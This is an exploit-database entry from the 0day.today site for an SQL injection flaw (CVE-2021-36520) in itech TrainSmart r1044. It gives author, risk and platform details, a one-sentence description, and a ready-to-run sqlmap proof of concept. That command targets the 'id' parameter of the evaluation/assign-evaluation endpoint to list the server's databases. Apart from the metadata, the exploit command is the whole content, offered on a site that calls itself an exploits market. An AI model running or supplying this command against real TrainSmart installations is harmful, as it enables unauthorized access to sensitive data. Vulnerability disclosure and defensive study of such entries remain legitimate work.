[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

itech TrainSmart r1044 - SQL injection Vulnerability

Author
Adrian Bondocea
Risk
[
Security Risk High
]
0day-ID
0day-ID-38488
Category
web applications
Date add
05-04-2023
CVE
CVE-2021-36520
Platform
php
# Exploit Title: itech TrainSmart r1044 - SQL injection
# Exploit Author: Adrian Bondocea
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/
# Version: TrainSmart r1044
# Tested on: Linux
# CVE : CVE-2021-36520

SQL injection vulnerability in itech TrainSmart r1044 allows remote
attackers to view sensitive information via crafted command using sqlmap.

PoC:
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs

#  0day.today [2024-07-05]  #